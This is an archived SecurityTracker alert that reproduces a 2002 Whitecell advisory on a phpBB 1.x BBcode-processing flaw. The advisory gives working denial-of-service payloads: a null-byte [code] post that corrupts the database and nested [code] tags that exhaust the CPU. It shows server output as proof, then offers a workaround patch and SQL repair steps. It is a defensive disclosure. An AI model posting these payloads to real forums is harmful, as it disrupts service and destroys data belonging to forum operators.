SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   phpBB Vendors:   phpBB Group
phpBB Forum May Let Remote Users Corrupt the phpBB Database Using Malicious 'BBcode'
SecurityTracker Alert ID:  1003979
SecurityTracker URL:  http://securitytracker.com/id/1003979
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 4 2002
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 1.0.0 - 1.4.4, possibly others
Description:   A vulnerability has been reported in phpBB. A remote user can create denial of service conditions and destroy phpBB databases.

Whitecell Security Systems has reported a vulnerability in the processing of nested 'BBcode' in the functions.php module. A remote user can post the following BBcode to cause the database to become corrupt:

[code]'\0'*800[/code]

A remote user can post the following BBcode to cause the system to consume nearly all available CPU resources:

[code]\0[code]\0[code]\0[/code]\0[/code]\0[/code]

Some information on how to fix a corrupt phpBB database is provided in the Source Message.

Impact:   A remote user may be able to corrupt the phpBB database.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.phpbb.com/ (Links to External Site)
Cause:   State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Underlying OS Comments:  PHP-based

Message History:   None.


 Source Message Contents

Subject:  (WSS-Advisories-02003) PHPBB BBcode Process Vulnerability


(WSS-Advisories-02003) PHPBB BBcode Process Vulnerability


Release infomation
------------------

Release Date: 2001-4-4
Author:   By Whitecell Security Systems(WSS)
          tombkeeper (tombkeeper@whitecell.org)
	      alert7     (alert7@whitecell.org)
Homepage: http://www.whitecell.org/


Impact: 
-------- 

WSS has found a vulnerability in PHPBB when PHPBB process BBcode,which could
enbale one user D.O.S system and destroy PHPBB databases.


Affected  Versions
--------------------

	phpBB Group phpBB 1.4.4
	phpBB Group phpBB 1.4.2
	phpBB Group phpBB 1.4.1
	phpBB Group phpBB 1.4.0
	phpBB Group phpBB 1.2.1
	phpBB Group phpBB 1.2.0
	phpBB Group phpBB 1.0.0
----------------------------

NOT TEST:
phpBB Group phpBB 2.x


Description:
------------

  phpbb support nesting BBcode [code][/code],[quote][/quote],[list][/list].
Unfortunately,there is a mistake when process BBcode in functions.php .


Exploit:
----------

submit the following poster:

[code]
\0\0\0\0\0\0\0
[/code]

In fact, the following data have saved to database after BBcode process.

[1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1]

submit the following poster:
[code]'\0'*800[/code]

see system
whitecell$ top
PID  USER      PRI  NI  SIZE  RSS SHARE STAT     TIME COMMAND
8643 nobody    13   0   212M  81M 13604 D     8.0 65.7   0:07 httpd

phpbb error message:
Could not enter post text! 

but in fact ,Two data  have alreay saved to databases.Now, the database
is uncompleted.If you brower the forum to see which you post,phpbb could 
report message:"Could not connect to the forums database."

submit 49 bytes data:

[code]\0[code]\0[code]\0[/code]\0[/code]\0[/code]

type top to see cpu: 
  PID USER     PRI  NI  SIZE  RSS SHARE STAT     TIME COMMAND
25741 nobody    14   0 11828 9996   416 R    99.9  7.8   2:38 httpd



Vendor
--------

http://www.phpbb.com


Workaround: 
-----------

1:disale BBcode until Vendor fixed.
2:modify functions.php bbencode_code()

function bbencode_code($message, $is_html_disabled)
{
	$message = preg_replace("/\[code\](.*?)\[\/code\]/si", "<!-- BBCode Start --><TABLE BORDER=0 ALIGN=CENTER WIDTH=85><TR><TD><font
 size=-1>Code:</font><HR></TD></TR><TR><TD><FONT SIZE=-1><PRE>\\1</PRE></FONT></TD></TR><TR><TD><HR></TD></TR></TABLE><!-- BBCode
 End -->", $message);
	return $message;

} // bbencode_code()

REPAIR DATABASE:
if url is http://host/forums/viewtopic.php?topic=1162&forum=1&0
you can use the following command to repair it :
whitecell$ mysql -uuser -ppasswd
mysql> use databasename;
mysql> select *  from topics where topic_id = 1162; //GET post_id
mysql> delete from posts where post_id = 6280;
mysql> delete from posts_text where post_id = 6280;
mysql> delete  from topics where topic_id = 1162;


------------ 

WSS is a non-profit and free technology organization . We are devoting to 
research and demonstration of weaknesses related to network services , 
communication security and system security. 


Copyright 2002 http://www.whitecell.org/  All rights reserved. 

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC